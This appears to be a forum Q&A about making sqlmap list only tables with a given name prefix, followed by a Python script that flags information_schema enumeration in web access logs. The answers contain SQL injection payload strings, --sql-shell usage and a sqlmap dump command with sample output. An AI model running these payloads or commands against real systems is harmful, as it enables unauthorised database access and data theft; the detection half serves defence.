I would like to know the SQLMap command that lets me retrieve just the tables that begin with a particular letter. Example with the letter "T":
sqlmap.py -u www.website -D database -T tables (...)
I believe you have 2 options in this case:
1. You can use sqlmap inside of a shell script to list the tables, and save those results to iterate over with successive calls to sqlmap.
2. You can use sqlmap to run a designated SQL query with the --sql-query option.
I don't think the tool is capable of running as you desire, like this:
sqlmap.py -u www.website -D database -T "t*"
SQLMap does not support this natively. But you can build your own query that retrieves exactly what you need. You need to see the --sql-shell parameter. It will pop up shell commands. Every single query you type in that shell will be executed through an SQL injection attack!
You can use the following query. It retrieves table names that start with "w":
SELECT table_name FROM information_schema.tables WHERE table_schema=database() and table_name LIKE 'w%';
Actually the above query is almost the same as native SQLMap payloads. For example SQLMap uses the following payload for Blind SQL Injections.
' AND SUBSTRING('SELECT version()', 1,1)
In this payload SQLMap tries to retrieve the results of the SELECT version(); query, which is predefined inside the SQLMap XML file. We are updating this query with the --sql-shell command. Every single "normal" database query you pass to the terminal is going to be replaced with SELECT version();.
' AND SUBSTRING('SELECT table_name FROM information_schema.tables WHERE table_schema=database() and table_name LIKE 'w%';', 1,1)
The rest of the SQL Injection mechanism will be okay as long as your custom query is correct.
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" \
    --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+
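Seen from the defending side, the information_schema query quoted in the answers above leaves a recognisable trace in web server logs. The following is an added example, not part of the original answers and not sqlmap code: a Python scan of access-log lines for catalog enumeration in request parameters. The log lines, /item.php, the IP addresses and the signal names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Query text copied from the answer above; everything else is constructed.
PAGE_QUERY = ("' AND SUBSTRING('SELECT table_name FROM information_schema.tables "
              "WHERE table_schema=database() and table_name LIKE 'w%';', 1,1)")

def log_line(ip, value):
    """Constructed combined-log-format line for /item.php?id=<value>."""
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /item.php?id={value} HTTP/1.1" 200 512')

ENC = quote(PAGE_QUERY, safe="")
SAMPLE_LOG = [
    log_line("10.0.0.5", "1"),                                  # ordinary request
    log_line("10.0.0.9", "1" + ENC),                            # URL-encoded once
    log_line("10.0.0.9", "1" + quote(ENC, safe="")),            # double-encoded
    log_line("10.0.0.7", quote("tables like 'w%'", safe="")),   # harmless text
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SIGNALS = {
    "metadata_catalog": re.compile(
        r"\binformation_schema\s*\.\s*(tables|columns|schemata)\b", re.I),
    "name_prefix_filter": re.compile(r"\btable_name\s+like\s+'[^']*%", re.I),
    "char_extraction": re.compile(r"\bsubstr(ing)?\s*\(", re.I),
}

def normalise(value):
    """Undo repeated URL-encoding, then collapse SQL comments and whitespace."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan(lines):
    """Return (client_ip, parameter, signals) for requests that name the catalog."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            found = sorted(k for k, rx in SIGNALS.items() if rx.search(normalise(raw)))
            if "metadata_catalog" in found:   # report only catalog references
                hits.append((ip, name, found))
    return hits
```

Only GET query strings are inspected here; parameters sent in POST bodies or headers do not appear in a standard access log and need application-level or WAF logging.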